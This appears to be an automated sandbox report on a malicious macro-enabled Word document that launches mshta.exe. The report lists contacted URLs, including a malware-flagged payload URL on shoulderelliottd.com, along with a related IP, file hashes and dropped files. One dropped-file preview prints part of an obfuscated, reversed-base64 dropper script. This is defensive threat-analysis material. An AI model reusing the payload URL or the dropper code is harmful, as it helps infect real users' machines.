                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false24FED24A-A137-4984-A755-6A68F4E24F72.0.drfalse
                                                                        high
                                                                        https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/24FED24A-A137-4984-A755-6A68F4E24F72.0.drfalse
                                                                          high
                                                                          http://weather.service.msn.com/data.aspx24FED24A-A137-4984-A755-6A68F4E24F72.0.drfalse
                                                                            high
                                                                            https://apis.live.net/v5.0/24FED24A-A137-4984-A755-6A68F4E24F72.0.drfalse
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks24FED24A-A137-4984-A755-6A68F4E24F72.0.drfalse
                                                                              high
                                                                              https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios24FED24A-A137-4984-A755-6A68F4E24F72.0.drfalse
                                                                                high
                                                                                https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml24FED24A-A137-4984-A755-6A68F4E24F72.0.drfalse
                                                                                  high
                                                                                  https://management.azure.com24FED24A-A137-4984-A755-6A68F4E24F72.0.drfalse
                                                                                    high
                                                                                    https://outlook.office365.com24FED24A-A137-4984-A755-6A68F4E24F72.0.drfalse
                                                                                      high
                                                                                      https://wus2.contentsync.24FED24A-A137-4984-A755-6A68F4E24F72.0.drfalse
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      https://incidents.diagnostics.office.com24FED24A-A137-4984-A755-6A68F4E24F72.0.drfalse
                                                                                        high
                                                                                        https://clients.config.office.net/user/v1.0/ios24FED24A-A137-4984-A755-6A68F4E24F72.0.drfalse
                                                                                          high
                                                                                          https://insertmedia.bing.office.net/odc/insertmedia24FED24A-A137-4984-A755-6A68F4E24F72.0.drfalse
                                                                                            high
                                                                                            https://o365auditrealtimeingestion.manage.office.com24FED24A-A137-4984-A755-6A68F4E24F72.0.drfalse
                                                                                              high
                                                                                              https://outlook.office365.com/api/v1.0/me/Activities24FED24A-A137-4984-A755-6A68F4E24F72.0.drfalse
                                                                                                high
                                                                                                https://api.office.net24FED24A-A137-4984-A755-6A68F4E24F72.0.drfalse
                                                                                                  high
                                                                                                  https://incidents.diagnosticssdf.office.com24FED24A-A137-4984-A755-6A68F4E24F72.0.drfalse
                                                                                                    high
                                                                                                    https://asgsmsproxyapi.azurewebsites.net/24FED24A-A137-4984-A755-6A68F4E24F72.0.drfalse
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
                                                                                                    https://clients.config.office.net/user/v1.0/android/policies24FED24A-A137-4984-A755-6A68F4E24F72.0.drfalse
                                                                                                      high
                                                                                                      https://entitlement.diagnostics.office.com24FED24A-A137-4984-A755-6A68F4E24F72.0.drfalse
                                                                                                        high
                                                                                                        https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json24FED24A-A137-4984-A755-6A68F4E24F72.0.drfalse
                                                                                                          high
                                                                                                          https://substrate.office.com/search/api/v2/init24FED24A-A137-4984-A755-6A68F4E24F72.0.drfalse
                                                                                                            high
                                                                                                            https://outlook.office.com/24FED24A-A137-4984-A755-6A68F4E24F72.0.drfalse
                                                                                                              high
                                                                                                              https://storage.live.com/clientlogs/uploadlocation24FED24A-A137-4984-A755-6A68F4E24F72.0.drfalse
                                                                                                                high
                                                                                                                https://outlook.office365.com/24FED24A-A137-4984-A755-6A68F4E24F72.0.drfalse
                                                                                                                  high
                                                                                                                  https://webshell.suite.office.com24FED24A-A137-4984-A755-6A68F4E24F72.0.drfalse
                                                                                                                    high
                                                                                                                    https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive24FED24A-A137-4984-A755-6A68F4E24F72.0.drfalse
                                                                                                                      high
                                                                                                                      https://substrate.office.com/search/api/v1/SearchHistory24FED24A-A137-4984-A755-6A68F4E24F72.0.drfalse
                                                                                                                        high
                                                                                                                        http://shoulderelliottd.com/boolk/QlaJk8C6vYqIyEwbdypBHv3yJR/wrWWNCD/77427/bebys8?cid=Bm9cAP&wP8zhkKmshta.exe, 00000006.00000003.728745747.000000000652C000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.728238876.00000000065D3000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.728533924.000000000322E000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.728654834.000000000652C000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.727987202.000000000A7E1000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.728554785.00000000031A9000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.728398097.000000000A9E3000.00000004.00000040.sdmp, mshta.exe, 00000006.00000002.730091556.00000000031AA000.00000004.00000001.sdmptrue
                                                                                                                        • Avira URL Cloud: malware
                                                                                                                        unknown
                                                                                                                        https://management.azure.com/24FED24A-A137-4984-A755-6A68F4E24F72.0.drfalse
                                                                                                                          high
                                                                                                                          https://login.windows.net/common/oauth2/authorize24FED24A-A137-4984-A755-6A68F4E24F72.0.drfalse
                                                                                                                            high
                                                                                                                            https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile24FED24A-A137-4984-A755-6A68F4E24F72.0.drfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            unknown
                                                                                                                            https://graph.windows.net/24FED24A-A137-4984-A755-6A68F4E24F72.0.drfalse
                                                                                                                              high
                                                                                                                              https://api.powerbi.com/beta/myorg/imports24FED24A-A137-4984-A755-6A68F4E24F72.0.drfalse
                                                                                                                                high
                                                                                                                                https://devnull.onenote.com24FED24A-A137-4984-A755-6A68F4E24F72.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://ncus.pagecontentsync.24FED24A-A137-4984-A755-6A68F4E24F72.0.drfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  unknown
                                                                                                                                  https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json24FED24A-A137-4984-A755-6A68F4E24F72.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://messaging.office.com/24FED24A-A137-4984-A755-6A68F4E24F72.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile24FED24A-A137-4984-A755-6A68F4E24F72.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://augloop.office.com/v224FED24A-A137-4984-A755-6A68F4E24F72.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing24FED24A-A137-4984-A755-6A68F4E24F72.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://skyapi.live.net/Activity/24FED24A-A137-4984-A755-6A68F4E24F72.0.drfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            https://clients.config.office.net/user/v1.0/mac24FED24A-A137-4984-A755-6A68F4E24F72.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://dataservice.o365filtering.com24FED24A-A137-4984-A755-6A68F4E24F72.0.drfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              https://api.cortana.ai24FED24A-A137-4984-A755-6A68F4E24F72.0.drfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown

                                                                                                                                              Contacted IPs

                                                                                                                                              • No. of IPs < 25%
                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                              • 75% < No. of IPs

                                                                                                                                              Public

                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                              194.62.42.144
                                                                                                                                              shoulderelliottd.comRussian Federation
                                                                                                                                              34464ZEISS-ASRUtrue

                                                                                                                                              General Information

                                                                                                                                              Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                                                                              Analysis ID:520837
                                                                                                                                              Start date:12.11.2021
                                                                                                                                              Start time:21:12:36
                                                                                                                                              Joe Sandbox Product:CloudBasic
                                                                                                                                              Overall analysis duration:0h 5m 8s
                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                              Report type:light
                                                                                                                                              Sample file name:instruct_11.21.doc.docm
                                                                                                                                              Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                              Run name:Potential for more IOCs and behavior
                                                                                                                                              Number of analysed new started processes analysed:18
                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                              Number of injected processes analysed:0
                                                                                                                                              Technologies:
                                                                                                                                              • HCA enabled
                                                                                                                                              • EGA enabled
                                                                                                                                              • HDC enabled
                                                                                                                                              • GSI enabled (VBA)
                                                                                                                                              • AMSI enabled
                                                                                                                                              Analysis Mode:default
                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                              Detection:MAL
                                                                                                                                              Classification:mal92.expl.winDOCM@6/18@1/1
                                                                                                                                              EGA Information:Failed
                                                                                                                                              HDC Information:Failed
                                                                                                                                              HCA Information:
                                                                                                                                              • Successful, ratio: 100%
                                                                                                                                              • Number of executed functions: 0
                                                                                                                                              • Number of non-executed functions: 0
                                                                                                                                              Cookbook Comments:
                                                                                                                                              • Adjust boot time
                                                                                                                                              • Enable AMSI
                                                                                                                                              • Found application associated with file extension: .docm
                                                                                                                                              • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                              • Attach to Office via COM
                                                                                                                                              • Scroll down
                                                                                                                                              • Close Viewer
                                                                                                                                              Warnings:
                                                                                                                                              Show All
                                                                                                                                              • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                                                                                                                              • Excluded IPs from analysis (whitelisted): 23.211.6.115, 52.109.76.68, 52.109.76.36, 52.109.12.21
                                                                                                                                              • Excluded domains from analysis (whitelisted): prod-w.nexus.live.com.akadns.net, prod.configsvc1.live.com.akadns.net, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, store-images.s-microsoft.com, config.officeapps.live.com, nexus.officeapps.live.com, displaycatalog.mp.microsoft.com, officeclient.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, europe.configsvc1.live.com.akadns.net
                                                                                                                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                              • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                              Simulations

                                                                                                                                              Behavior and APIs

                                                                                                                                              TimeTypeDescription
                                                                                                                                              21:13:57API Interceptor1x Sleep call for process: mshta.exe modified

                                                                                                                                              Joe Sandbox View / Context

                                                                                                                                              IPs

                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                              194.62.42.144particulars 11.010.2021.docGet hashmaliciousBrowse
                                                                                                                                              • shoulderelliottd.com/boolk/QlaJk8C6vYqIyEwbdypBHv3yJR/wrWWNCD/77427/bebys8?cid=Bm9cAP&wP8zhkK=aNLC3bJChZM5GauIB&=S0MRS72jqtkORxKA3iUkjdS
                                                                                                                                              particulars 11.010.2021.docGet hashmaliciousBrowse
                                                                                                                                              • shoulderelliottd.com/boolk/QlaJk8C6vYqIyEwbdypBHv3yJR/wrWWNCD/77427/bebys8?cid=Bm9cAP&wP8zhkK=aNLC3bJChZM5GauIB&=S0MRS72jqtkORxKA3iUkjdS
                                                                                                                                              jk2BhrWvzs.docmGet hashmaliciousBrowse
                                                                                                                                              • shoulderelliottd.com/boolk/QlaJk8C6vYqIyEwbdypBHv3yJR/wrWWNCD/77427/bebys8?cid=Bm9cAP&wP8zhkK=aNLC3bJChZM5GauIB&=S0MRS72jqtkORxKA3iUkjdS
                                                                                                                                              jk2BhrWvzs.docmGet hashmaliciousBrowse
                                                                                                                                              • shoulderelliottd.com/boolk/QlaJk8C6vYqIyEwbdypBHv3yJR/wrWWNCD/77427/bebys8?cid=Bm9cAP&wP8zhkK=aNLC3bJChZM5GauIB&=S0MRS72jqtkORxKA3iUkjdS

                                                                                                                                              Domains

                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                              shoulderelliottd.comparticulars 11.010.2021.docGet hashmaliciousBrowse
                                                                                                                                              • 194.62.42.144
                                                                                                                                              particulars 11.010.2021.docGet hashmaliciousBrowse
                                                                                                                                              • 194.62.42.144
                                                                                                                                              jk2BhrWvzs.docmGet hashmaliciousBrowse
                                                                                                                                              • 194.62.42.144
                                                                                                                                              jk2BhrWvzs.docmGet hashmaliciousBrowse
                                                                                                                                              • 194.62.42.144

                                                                                                                                              ASN

                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                              ZEISS-ASRUinstruct_11.21.doc.docmGet hashmaliciousBrowse
                                                                                                                                              • 194.62.42.144
                                                                                                                                              particulars 11.010.2021.docGet hashmaliciousBrowse
                                                                                                                                              • 194.62.42.144
                                                                                                                                              particulars 11.010.2021.docGet hashmaliciousBrowse
                                                                                                                                              • 194.62.42.144
                                                                                                                                              inquiry-11.21.docGet hashmaliciousBrowse
                                                                                                                                              • 194.62.42.45
                                                                                                                                              inquiry-11.21.docGet hashmaliciousBrowse
                                                                                                                                              • 194.62.42.45
                                                                                                                                              inquiry-11.21.docGet hashmaliciousBrowse
                                                                                                                                              • 194.62.42.45
                                                                                                                                              bE5TVG6QkV.docmGet hashmaliciousBrowse
                                                                                                                                              • 194.62.42.31
                                                                                                                                              bE5TVG6QkV.docmGet hashmaliciousBrowse
                                                                                                                                              • 194.62.42.31
                                                                                                                                              pZt5P80bs1.docmGet hashmaliciousBrowse
                                                                                                                                              • 194.62.42.143
                                                                                                                                              pZt5P80bs1.docmGet hashmaliciousBrowse
                                                                                                                                              • 194.62.42.143
                                                                                                                                              jk2BhrWvzs.docmGet hashmaliciousBrowse
                                                                                                                                              • 194.62.42.144
                                                                                                                                              jk2BhrWvzs.docmGet hashmaliciousBrowse
                                                                                                                                              • 194.62.42.144
                                                                                                                                              e6vHWtg9cC.docmGet hashmaliciousBrowse
                                                                                                                                              • 194.62.42.42
                                                                                                                                              e6vHWtg9cC.docmGet hashmaliciousBrowse
                                                                                                                                              • 194.62.42.42
                                                                                                                                              4htQNyKQ9P.docmGet hashmaliciousBrowse
                                                                                                                                              • 194.62.42.116
                                                                                                                                              oNmDvNFrqi.docmGet hashmaliciousBrowse
                                                                                                                                              • 194.62.42.116
                                                                                                                                              4htQNyKQ9P.docmGet hashmaliciousBrowse
                                                                                                                                              • 194.62.42.116
                                                                                                                                              oNmDvNFrqi.docmGet hashmaliciousBrowse
                                                                                                                                              • 194.62.42.116
                                                                                                                                              oNmDvNFrqi.docmGet hashmaliciousBrowse
                                                                                                                                              • 194.62.42.116
                                                                                                                                              eeJ9i33NTw.docmGet hashmaliciousBrowse
                                                                                                                                              • 194.62.42.116

                                                                                                                                              JA3 Fingerprints

                                                                                                                                              No context

                                                                                                                                              Dropped Files

                                                                                                                                              No context

                                                                                                                                              Created / dropped Files

                                                                                                                                              C:\Users\Public\~$wPowNext.hta
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):162
                                                                                                                                              Entropy (8bit):2.3801933752302675
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:Rl/ZdR3ltl/l/hZleN8uVXL+z/lXGxXT:RtZTVtJbeN8uVXLUw
                                                                                                                                              MD5:95C14D156764B73CF96CCC17D84EB18A
                                                                                                                                              SHA1:D80ACFC1D099FEBDD2F72F340AB4C9CC198B3849
                                                                                                                                              SHA-256:488020AAB3E0B07FC9B52A490063B520A82D5F9BDA874E4B021E41DBA5848D9C
                                                                                                                                              SHA-512:36E9EB26A20DBD7F265C666DD608BEA214AD36A905494E921FFE1191FF09EE80C6ABECAF5BC090BAD1E708615D3E75726871EBC36D34CB180455E15C3C1144E1
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview: .pratesh................................................p.r.a.t.e.s.h.........e...............................i...............................m...............$...
                                                                                                                                              C:\Users\Public\~WRD0000.tmp
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                              File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):3346
                                                                                                                                              Entropy (8bit):5.726896594481782
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:bGotzrVgMR61CQB7MGxag4hE8h9LU9fLtrlv:yCrVnuPMGByEkmp
                                                                                                                                              MD5:FA2B89027304712FB8366C1F6B4F2827
                                                                                                                                              SHA1:6F851332C08998D25D839112A5C9D3CA8E57FCC0
                                                                                                                                              SHA-256:6E1338E07405A9B14DB254B9769767EA824CF3AC1C8DFECB3513E95135ECEAEE
                                                                                                                                              SHA-512:8C1705A8165C062D9413F6FC00A697F6E62D038A04D5A347D036B73A97A64FE1831038C8007A1F29F80A2F765C5428463CEAE9EAF53FAED558752F24A32744CD
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview: <html><body><div id='youGirlYou' style='font-color: #000'>lave</div><div id='karolLikeDow' style='font-color: #000'>2FmcgcWayxGTptWZE92byBSPg4WZ3BSQjRXa2VGWPJmalNGdoISbzhXbsJjL41GboRHdwJSK7cWayxGTptWZE92by5ybwVmboIyRFRlIsAiIoRHdwpzLvMHavVHbkVmclxGbp9Gd0RmLj9WbvI2bvx2avEFbhp0a4MkN2lVcJlXR3JGZ5BnQIZ3M5pkUvcncXdlTDR0L3cDNyczLiVmY5NHO/MWak1jQtlzYBBlJ3BFO6h2aL1TYOx0QzImSDhmWNVzRhVXSCZSPTBTTSN1NyoWc0t2TSh3SBNTaVtmakNlIsAiZhx2cllyOnlmcsxUarVGRv9mcuMXZuRGKpsTamhyZpJHbMl2alR0bvJnLzRXY0V3cg0TPgIDMwkye0JXe7ZXYyByahJ3bsl1b1dUayxGI9AibldHIBNGdpZXZY9kYqV2Y0hiIhR2bkJmLzRnclFWbikyOrFmcvxWWvV3RpJHbu8Gcl52OrFmcvxWWvV3RpJHbuQXewVGI9ASM7sWYy9GbZ9WdHlmcs5ydylGdlhyZpJHbMl2alR0bvJnLyV2cw9mbzVmYvRWepszahJ3bsl1b1dUayxmLzFmdlR3bmlGblhiIjpDXcV3clJ3ccxFc1JGbpNGXcRXdiV2RpJHbM9WYk5iawdmIsAiMpszahJ3bsl1b1dUayxmLjx2bzV2O9NWY0NGaoUWK71Xf|||==gdhJHInlmcsxUarVGTvZXZg0DIuV2dgE0Y0lmdlh1TipWZjRHKic3cjJXawRnLzhWZsxmIpsjdhJHI59WdQ92dUVnYlBSPg4WZ3BSQjRXa2VGWPJmalNGdoIycjJXawRXaudmLmlGblNXezRXZt9mYqV2Y0JSK7cWayxGTptWZM9mdl5ic1
                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\24FED24A-A137-4984-A755-6A68F4E24F72
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                              File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):140133
                                                                                                                                              Entropy (8bit):5.358602864958319
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:1536:wcQIfgxrBdA3gBwtnQ9DQW+z2Y34Ff7nXboOidXiE6LWmE9:cuQ9DQW+zVXfH
                                                                                                                                              MD5:2D93B770096E7B50E7CC1A39E615A77B
                                                                                                                                              SHA1:DF7FB0B6BCB9BF96CD8569FBEFE4F9955DD3E103
                                                                                                                                              SHA-256:5566F5C1F509E7A67AEF79EC286E15F325E66BC8B386109EA51A28A2B4DC27EA
                                                                                                                                              SHA-512:A9FD471FCBFFAB2B9520634E4BEA045D14B0C5AB30B8F106F889803C44C2F85131D28744898B2AB419F46B3EE2D84094D857AEF8A2872DC34D8308148221A3F6
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-11-12T20:13:28">.. Build: 16.0.14708.30526-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\C4F64A59.gif
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                              File Type:GIF image data, version 89a, 774 x 198
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):14327
                                                                                                                                              Entropy (8bit):7.959467120915826
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:384:3j0EEYpcVhE1ltmTV/YZO4NSCWl822TnU0:w02VWnZdw9822zv
                                                                                                                                              MD5:76DA3E2154587DD3D69A81FCDB0C7364
                                                                                                                                              SHA1:0F23E27B3A456B22A11D3FBC3132397B0DDC9357
                                                                                                                                              SHA-256:F9299AB3483A8F729B2ACA2111B46E9952D4491AC66124FEC22C1C789EBC3139
                                                                                                                                              SHA-512:A20BA525941043701E8DA5234A286FF2AF0A5F4C45998F1BA3BD59785FF4CDDAA72DE316D0BC651C68F30A6587741539B51D356BF5D6FEEAFCAE492AB277BB45
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:moderate, very likely benign file
                                                                                                                                              Preview: GIF89a.............A..)P..?...........4.............P..K.Uo.f}.v..............=..J..G..M..J..H..F..=..O..L..K..@..<..;..9..5z.R..N..M..M..3v.2s.P..1r.1q.W..F..I..J. K.&Q.Ch.A`.d............C..R.."L.T..A...h..g.*^.%T.O..P..8..4v..@.U..T..S..Q..F..>..S..P..@..2m.[..Y..X..V..R..B..U..T..W..O..T..O.*g.|...............I..M..Q..W...1.W.._..W..]..]..\..[..Z..W..V..C..5p.b..]..[..X..W..Y..Q..O..^..[..Z../a.]..\..Z..^..X.._.._..I..`..]..a..`.!c.!^.%e.$b.&f.)h.5q.>v.H~.Y..h..v.............................N..R..U..X..Z..b..`..\..`..a..b..c..d..O. d. d..R.!f."g."e.!f.#g.,m............._."k..P..9g%m........As*z.)x.,~.+|.+{.&n. \..Gy*v.6..K....../...Bm.........6....;..9..8..A..:..:..3..+l.B..C..F..N..R..T..\..i..@..@..=..A..@..D..=..7.."Uy<..%].K..N.......................!..NETSCAPE2.0.....!.......,...............H......*\....#J.H....3j.... C..I...(S.\...0c.I...8s.....@...J...H.*]...P.J.J...X.j....`..K...h.]...p..K...x..........L.....+^....#K.L....3k.....
                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRF{C8F000F6-2878-4270-8CA4-E7B38F5CB954}.tmp
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):29696
                                                                                                                                              Entropy (8bit):3.766759730471126
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:384:/UtzuhEb67dfN0j3i89tE6hEb6+dfN0j3i8:C+Eb67facCEb6+fa
                                                                                                                                              MD5:98679A82C6CF77E2F15931A7342CA103
                                                                                                                                              SHA1:9EEA479836E1339FAE5638A68CFB2ACF098DDF44
                                                                                                                                              SHA-256:4E51EAFC653B9E3187FE8D35E6D0E5E0A764B9C242A07FF879B55194F5FFA3B2
                                                                                                                                              SHA-512:AAAA2493ADCF87CD4ED913321F5A923D34DFD921E1866F47D0D06E7DA12BEB208E43E207CC80C4C052A72574D024F7235C88492323C68FB297ACC7E0D09F01F3
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview: ......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................)....................................... ...(...!..."...#...$...%...&...'...*...7.......+...,...-......./...0...1...2...3...4...5...6.......8...........................................................................................................................................................................................................................................................................
                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{D1BBD753-2A54-49B7-9D6A-D5C5939D5159}.tmp
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):21166
                                                                                                                                              Entropy (8bit):2.690771718216997
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:384:IcAAooAAsM3V+oTpArJltBu+UaGmXfKfUiwvXv7vUo6s1w6:IcAAooAAsM3V+oTpArJltBu+UaGmXfKS
                                                                                                                                              MD5:DEDC6320F5E8B7E7877C43BB5618EA55
                                                                                                                                              SHA1:2143954452A74AA00B077664B82544E1DAA51AC2
                                                                                                                                              SHA-256:37EDEA11F289D8863015712C82ADF36A17584793B49D6222F70D4BD0B9DF8A8C
                                                                                                                                              SHA-512:030B6F931B4424DB621348E4089F5F69D50BA13B34772E611ADA4A20B5DF67582EB4959C5FD5B45BAFDA90E8965BEE5AAA3926ACB89A22C6403CC502A83B45D3
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview: ../.<.$.1.h.$.1.t.$.1.m.$.1.l.$.1.>.$.1.<.$.1.b.$.1.o.$.1.d.$.1.y.$.1.>.$.1.<.$.1.d.$.1.i.$.1.v.$.1. .$.1.i.$.1.d.$.1.=.$.1.'.$.1.y.$.1.o.$.1.u.$.1.G.$.1.i.$.1.r.$.1.l.$.1.Y.$.1.o.$.1.u.$.1.'.$.1. .$.1.s.$.1.t.$.1.y.$.1.l.$.1.e.$.1.=.$.1.'.$.1.f.$.1.o.$.1.n.$.1.t.$.1.-.$.1.c.$.1.o.$.1.l.$.1.o.$.1.r.$.1.:.$.1. .$.1.#.$.1.0.$.1.0.$.1.0.$.1.'.$.1.>.$.1.l.$.1.a.$.1.v.$.1.e.$.1.<.$.1./.$.1.d.$.1.i.$.1.v.$.1.>.$.1.<.$.1.d.$.1.i.$.1.v.$.1. ...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{F8C6CC2A-BDEA-4097-B472-52AC1B92BF84}.tmp
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1024
                                                                                                                                              Entropy (8bit):0.05390218305374581
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:ol3lYdn:4Wn
                                                                                                                                              MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                                                                                              SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                                                                                              SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                                                                                              SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                                                                                              Malicious:false
                                                                                                                                              Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\error[1]
                                                                                                                                              Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                              File Type:HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):3247
                                                                                                                                              Entropy (8bit):5.459946526910292
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:vKFlZ/kxjqD9zqp36wxVJddFAdd5Ydddopdyddv+dd865FhlleXckVDuca:C0pv+GkduSDl6LRa
                                                                                                                                              MD5:16AA7C3BEBF9C1B84C9EE07666E3207F
                                                                                                                                              SHA1:BF0AFA2F8066EB7EE98216D70A160A6B58EC4AA1
                                                                                                                                              SHA-256:7990E703AE060C241EBA6257D963AF2ECF9C6F3FBDB57264C1D48DDA8171E754
                                                                                                                                              SHA-512:245559F757BAB9F3D63FB664AB8F2D51B9369E2B671CF785A6C9FB4723F014F5EC0D60F1F8555D870855CF9EB49F3951D98C62CBDF9E0DC1D28544966D4E70F1
                                                                                                                                              Malicious:false
